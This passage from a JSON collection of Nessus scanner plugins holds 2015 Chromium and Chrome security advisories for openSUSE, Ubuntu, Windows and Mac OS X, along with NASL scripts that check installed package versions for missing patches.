of crafed programs running in NaCl sandbox \n\n - CVE-2015-3334: 'Media: Allowed by you' sometimes not shown in a permissions table\n\nNew functionality added :\n\n - A number of new apps, extension and Web Platform APIs (including the Push API!)\n\n - Lots of under the hood changes for stability and performance", "cvss3": {"score": null, "vector": null}, "published": "2015-04-23T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2015-320)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249", "CVE-2015-3333", "CVE-2015-3334", "CVE-2015-3335", "CVE-2015-3336"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-320.NASL", "href": "https://www.tenable.com/plugins/nessus/83025", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-320.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83025);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\", \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1244\", \"CVE-2015-1245\", \"CVE-2015-1246\", \"CVE-2015-1247\", \"CVE-2015-1248\", \"CVE-2015-1249\", \"CVE-2015-3333\", \"CVE-2015-3334\", \"CVE-2015-3335\", \"CVE-2015-3336\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2015-320)\");\n script_summary(english:\"Check for the openSUSE-2015-320 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to latest stable release 42.0.2311.90 to fix\nsecurity issues and bugs. The following vulnerabilities were fixed :\n\n - CVE-2015-1235: Cross-origin-bypass in HTML parser.\n\n - CVE-2015-1236: Cross-origin-bypass in Blink.\n\n - CVE-2015-1237: Use-after-free in IPC.\n\n - CVE-2015-1238: Out-of-bounds write in Skia.\n\n - CVE-2015-1240: Out-of-bounds read in WebGL.\n\n - CVE-2015-1241: Tap-Jacking.\n\n - CVE-2015-1242: Type confusion in V8.\n\n - CVE-2015-1244: HSTS bypass in WebSockets.\n\n - CVE-2015-1245: Use-after-free in PDFium.\n\n - CVE-2015-1246: Out-of-bounds read in Blink.\n\n - CVE-2015-1247: Scheme issues in OpenSearch.\n\n - CVE-2015-1248: SafeBrowsing bypass.\n\n - CVE-2015-1249: Various fixes from internal audits,\n fuzzing and other initiatives.\n\n - CVE-2015-3333: Multiple vulnerabilities in V8 fixed at\n the tip of the 4.2 branch (currently 4.2.77.14).\n\n - CVE-2015-3336: fullscreen and UI locking without user\n confirmeation\n\n - CVE-2015-3335: unspecified impact of crafed programs\n running in NaCl sandbox \n\n - CVE-2015-3334: 'Media: Allowed by you' sometimes not\n shown in a permissions table\n\nNew functionality added :\n\n - A number of new apps, extension and Web Platform APIs\n (including the Push API!)\n\n - Lots of under the hood changes for stability and\n performance\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=927302\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-42.0.2311.90-78.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-debuginfo-42.0.2311.90-78.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-42.0.2311.90-78.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debuginfo-42.0.2311.90-78.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debugsource-42.0.2311.90-78.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-gnome-42.0.2311.90-78.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-kde-42.0.2311.90-78.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-42.0.2311.90-78.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-debuginfo-42.0.2311.90-78.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-42.0.2311.90-23.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-42.0.2311.90-23.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-42.0.2311.90-23.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-42.0.2311.90-23.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-42.0.2311.90-23.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-gnome-42.0.2311.90-23.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-kde-42.0.2311.90-23.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-42.0.2311.90-23.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-42.0.2311.90-23.3\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:12", "description": "An issue was discovered in the HTML parser in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to bypass same-origin restrictions.\n(CVE-2015-1235)\n\nAn issue was discovered in the Web Audio API implementation in Blink.\nIf a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to bypass same-origin restrictions. (CVE-2015-1236)\n\nA use-after-free was discovered in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-1237)\n\nAn out-of-bounds write was discovered in Skia. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash or execute arbitrary code with the privileges of the user invoking the program. (CVE-2015-1238)\n\nAn out-of-bounds read was discovered in the WebGL implementation. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash. (CVE-2015-1240)\n\nAn issue was discovered with the interaction of page navigation and touch event handling. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to conduct 'tap jacking' attacks. (CVE-2015-1241)\n\nA type confusion bug was discovered in V8. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-1242)\n\nIt was discovered that websocket connections were not upgraded whenever a HSTS policy is active. A remote attacker could potentially exploit this to conduct a man in the middle (MITM) attack.\n(CVE-2015-1244)\n\nAn out-of-bounds read was discovered in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash. (CVE-2015-1246)\n\nMultiple security issues were discovered in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to read uninitialized memory, cause a denial of service via application crash or execute arbitrary code with the privileges of the user invoking the program. (CVE-2015-1249)\n\nA use-after-free was discovered in the file picker implementation. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash or execute arbitrary code with the privileges of the user invoking the program. (CVE-2015-1321)\n\nMultiple security issues were discovered in V8. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to read uninitialized memory, cause a denial of service via renderer crash or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-3333).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-28T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 14.10 / 15.04 : oxide-qt vulnerabilities (USN-2570-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1246", "CVE-2015-1249", "CVE-2015-1321", "CVE-2015-3333"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs", "p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs-extra", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "UBUNTU_USN-2570-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83109", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2570-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83109);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\", \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1244\", \"CVE-2015-1246\", \"CVE-2015-1249\", \"CVE-2015-1321\", \"CVE-2015-3333\");\n script_bugtraq_id(74165, 74167, 74221, 74411);\n script_xref(name:\"USN\", value:\"2570-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 14.10 / 15.04 : oxide-qt vulnerabilities (USN-2570-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An issue was discovered in the HTML parser in Blink. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to bypass same-origin restrictions.\n(CVE-2015-1235)\n\nAn issue was discovered in the Web Audio API implementation in Blink.\nIf a user were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to bypass same-origin\nrestrictions. (CVE-2015-1236)\n\nA use-after-free was discovered in Chromium. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer crash, or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2015-1237)\n\nAn out-of-bounds write was discovered in Skia. If a user were tricked\nin to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via application\ncrash or execute arbitrary code with the privileges of the user\ninvoking the program. (CVE-2015-1238)\n\nAn out-of-bounds read was discovered in the WebGL implementation. If a\nuser were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to cause a denial of service\nvia renderer crash. (CVE-2015-1240)\n\nAn issue was discovered with the interaction of page navigation and\ntouch event handling. If a user were tricked in to opening a specially\ncrafted website, an attacker could potentially exploit this to conduct\n'tap jacking' attacks. (CVE-2015-1241)\n\nA type confusion bug was discovered in V8. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer crash, or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2015-1242)\n\nIt was discovered that websocket connections were not upgraded\nwhenever a HSTS policy is active. A remote attacker could potentially\nexploit this to conduct a man in the middle (MITM) attack.\n(CVE-2015-1244)\n\nAn out-of-bounds read was discovered in Blink. If a user were tricked\nin to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via renderer\ncrash. (CVE-2015-1246)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1249)\n\nA use-after-free was discovered in the file picker implementation. If\na user were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to cause a denial of service\nvia application crash or execute arbitrary code with the privileges of\nthe user invoking the program. (CVE-2015-1321)\n\nMultiple security issues were discovered in V8. If a user were tricked\nin to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via renderer crash or execute arbitrary code with the\nprivileges of the sandboxed render process. (CVE-2015-3333).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2570-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected liboxideqtcore0, oxideqt-codecs and / or\noxideqt-codecs-extra packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|14\\.10|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 14.10 / 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.6.5-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"oxideqt-codecs\", pkgver:\"1.6.5-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"oxideqt-codecs-extra\", pkgver:\"1.6.5-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"liboxideqtcore0\", pkgver:\"1.6.5-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"oxideqt-codecs\", pkgver:\"1.6.5-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"oxideqt-codecs-extra\", pkgver:\"1.6.5-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.6.5-0ubuntu0.15.04.1\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"oxideqt-codecs\", pkgver:\"1.6.5-0ubuntu0.15.04.1\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"oxideqt-codecs-extra\", pkgver:\"1.6.5-0ubuntu0.15.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0 / oxideqt-codecs / oxideqt-codecs-extra\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:53:03", "description": "The version of Google Chrome installed on the remote Windows host is prior to 42.0.2311.135. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified user-after-free memory error exists in DOM. (CVE-2015-1243)\n\n - Other unspecified errors exists. No other details are available. (CVE-2015-1250)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-29T00:00:00", "type": "nessus", "title": "Google Chrome < 42.0.2311.135 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_42_0_2311_135.NASL", "href": "https://www.tenable.com/plugins/nessus/83136", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83136);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-1243\", \"CVE-2015-1250\");\n script_bugtraq_id(74389);\n\n script_name(english:\"Google Chrome < 42.0.2311.135 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 42.0.2311.135. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An unspecified user-after-free memory error exists in\n DOM. (CVE-2015-1243)\n\n - Other unspecified errors exists. No other details are\n available. (CVE-2015-1250)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.ca/2015/04/stable-channel-update_28.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f54c26a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 42.0.2311.135 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1250\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'42.0.2311.135', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:16", "description": "The version of Google Chrome on the remote host is prior to 42.0.2311.135 and is affected by the following vulnerabilities :\n\n - A use-after-free condition in the 'MutationObserver::disconnect()' function in 'dom/MutationObserver.cpp'. The issue is triggered when iterating over a cloned set and attempting to unregister a MutationObserver registration already unregistered from the original set. With a specially crafted web page, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code. (CVE-2015-1243)\n\n - A flaw exists in 'media/audio/audio_parameters.cc' that is triggered when handling channel counts that do not match the channel layout. This may allow a context-dependent attacker to potentially execute arbitrary code.\n\n - A flaw exists that is triggered when handling audio conversion with certain channel layouts. This may allow a context-dependent attacker to potentially execute arbitrary code.\n\n - A flaw exists in the 'HTMLImportTreeRoot::recalcTimerFired()' function in 'html/imports/HTMLImportTreeRoot.cpp'. With a specially crafted web page, a context-dependent attacker can potentially execute arbitrary code.\n\n - OpenJPEG as used in Google Chrome contains an integer overflow condition in the 'opj_j2k_update_image_data()' function in 'j2k.c' that is triggered when handling overly large image dimensions. This may allow a context-dependent attacker to cause a heap-based buffer overflow, crashing an application linked against the library or potentially allow execution of arbitrary code. (CVE-2015-1250)", "cvss3": {"score": null, "vector": null}, "published": "2015-06-16T00:00:00", "type": "nessus", "title": "Google Chrome < 42.0.2311.135 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "8779.PASL", "href": "https://www.tenable.com/plugins/nnm/8779", "sourceData": "Binary data 8779.pasl", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:46:03", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 42.0.2311.135. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified user-after-free memory error exists in DOM. (CVE-2015-1243)\n\n - Other unspecified errors exists. No other details are available. (CVE-2015-1250)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-29T00:00:00", "type": "nessus", "title": "Google Chrome < 42.0.2311.135 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_42_0_2311_135.NASL", "href": "https://www.tenable.com/plugins/nessus/83137", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83137);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2015-1243\", \"CVE-2015-1250\");\n script_bugtraq_id(74389);\n\n script_name(english:\"Google Chrome < 42.0.2311.135 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 42.0.2311.135. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An unspecified user-after-free memory error exists in\n DOM. (CVE-2015-1243)\n\n - Other unspecified errors exists. No other details are\n available. (CVE-2015-1250)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.ca/2015/04/stable-channel-update_28.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f54c26a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 42.0.2311.135 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1250\");\n\n script_set_attribute(attribute:\"exploitability_ease\", 